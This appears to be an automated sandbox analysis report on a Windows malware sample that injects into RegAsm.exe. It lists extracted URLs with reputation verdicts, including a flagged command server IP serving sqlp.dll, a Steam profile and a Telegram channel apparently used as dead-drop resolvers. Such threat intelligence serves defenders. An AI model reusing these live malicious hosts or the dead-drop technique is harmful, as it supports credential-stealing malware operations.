                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem1
                      File and Directory Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow44
                      System Information Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net020%URL Reputationsafe
                      https://help.steampowered.com/en/0%URL Reputationsafe
                      http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                      http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                      https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                      https://steamcommunity.com/profiles/76561199780418869H0%Avira URL Cloudsafe
                      https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                      https://steamcommunity.com/market/0%Avira URL Cloudsafe
                      https://5.75.211.162/sqlp.dllg100%Avira URL Cloudmalware
                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                      https://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                      http://crl.entrust.net/ts1ca.crl00%URL Reputationsafe
                      https://store.steampowered.com/legal/0%URL Reputationsafe
                      https://store.steampowered.com/news/0%Avira URL Cloudsafe
                      https://5.75.211.162/sqlp.dllb100%Avira URL Cloudmalware
                      https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%URL Reputationsafe
                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl0%URL Reputationsafe
                      http://www.entrust.net/rpa030%URL Reputationsafe
                      http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                      http://aia.entrust.net/ts1-chain256.cer010%URL Reputationsafe
                      http://upx.sf.net0%URL Reputationsafe
                      https://store.steampowered.com/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
                      https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                      https://steamcommunity.com/profiles/76561199780418869/badges100%Avira URL Cloudmalware
                      https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a0%Avira URL Cloudsafe
                      https://steamcommunity.com/profiles/76561199780418869/inventory/100%Avira URL Cloudmalware
                      https://store.steampowered.com/stats/0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%Avira URL Cloudsafe
                      http://cowod.hopto.org_DEBUG.zip/c0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
                      https://steamcommunity.com/profiles/76561199780418869100%Avira URL Cloudmalware
                      http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%Avira URL Cloudsafe
                      https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
                      https://5.75.211.162/%100%Avira URL Cloudmalware
                      https://store.steampowered.com/mobile0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english0%URL Reputationsafe
                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
                      http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                      https://5.75.211.162100%Avira URL Cloudmalware
                      https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.00%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                      https://www.entrust.net/rpa00%URL Reputationsafe
                      https://store.steampowered.com/about/0%URL Reputationsafe
                      https://5.75.211.162.exe0%Avira URL Cloudsafe
                      https://t.me/ae5ed100%Avira URL Cloudmalware
                      https://store.steampowered.com/privac0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
                      https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                      https://5.75.211.162/sqlp.dll100%Avira URL Cloudmalware
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP0%Avira URL Cloudsafe
                      https://5.75.211.162/sqlp.dlls.exe100%Avira URL Cloudmalware
                      https://5.75.211.162/E100%Avira URL Cloudmalware
                      https://steamcommunity.com/login/home/?goto=profiles%2F765611997804188690%Avira URL Cloudsafe
                      https://5.75.211.162/2100%Avira URL Cloudmalware
                      https://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en0%Avira URL Cloudsafe
                      https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg0%Avira URL Cloudsafe
                      https://5.75.211.162/V100%Avira URL Cloudmalware
                      https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%Avira URL Cloudsafe
                      https://5.75.211.162/M100%Avira URL Cloudmalware
                      https://5.75.211.162/c100%Avira URL Cloudmalware
                      https://steamcommunity.com/0%Avira URL Cloudsafe
                      https://5.75.211.162/100%Avira URL Cloudmalware
                      https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%Avira URL Cloudsafe
                      https://5.75.211.162BKFCB0%Avira URL Cloudsafe
                      https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      steamcommunity.com
                      104.102.49.254
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://steamcommunity.com/profiles/76561199780418869true
                        • Avira URL Cloud: malware
                        unknown
                        https://5.75.211.162/true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.211.162/sqlp.dllgRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199780418869HRegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net03file.exefalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/?subsection=broadcastsRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net02file.exefalse
                        • URL Reputation: safe
                        unknown
                        https://help.steampowered.com/en/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/market/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/news/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.211.162/sqlp.dllbRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=eRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199780418869/badgesRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drtrue
                        • Avira URL Cloud: malware
                        unknown
                        https://steamcommunity.com/profiles/76561199780418869/inventory/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drtrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.valvesoftware.com/legal.htmRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/discussions/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/stats/RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.211.162/%RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.211.16276561199780418869[1].htm.3.drtrue
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        http://crl.entrust.net/ts1ca.crl0file.exefalse
                        • URL Reputation: safe
                        unknown
                        https://steamcommunity.com/workshop/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/privacRegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://t.me/ae5edfile.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://5.75.211.162.exeRegAsm.exe, 00000003.00000002.2183942555.000000000058A000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.211.162/sqlp.dllRegAsm.exe, 00000003.00000002.2183942555.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://5.75.211.162/sqlp.dlls.exeRegAsm.exe, 00000003.00000002.2183942555.00000000005A1000.00000040.00000400.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.211.162/ERegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://steamcommunity.com/login/home/?goto=profiles%2F7656119978041886976561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.entrust.net/rpa03file.exefalse
                        • URL Reputation: safe
                        unknown
                        http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/points/shop/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://aia.entrust.net/ts1-chain256.cer01file.exefalse
                        • URL Reputation: safe
                        unknown
                        http://upx.sf.netAmcache.hve.9.drfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.211.162/2RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://5.75.211.162/VRegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTgRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.211.162/cRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=englishRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                        • URL Reputation: safe
                        unknown
                        https://5.75.211.162/MRegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
